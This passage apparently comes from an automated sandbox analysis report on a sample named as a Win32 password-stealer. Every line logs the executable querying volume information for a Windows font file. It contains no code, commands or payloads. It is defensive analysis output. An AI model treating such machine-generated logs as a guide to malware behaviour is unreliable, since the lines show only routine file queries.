          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
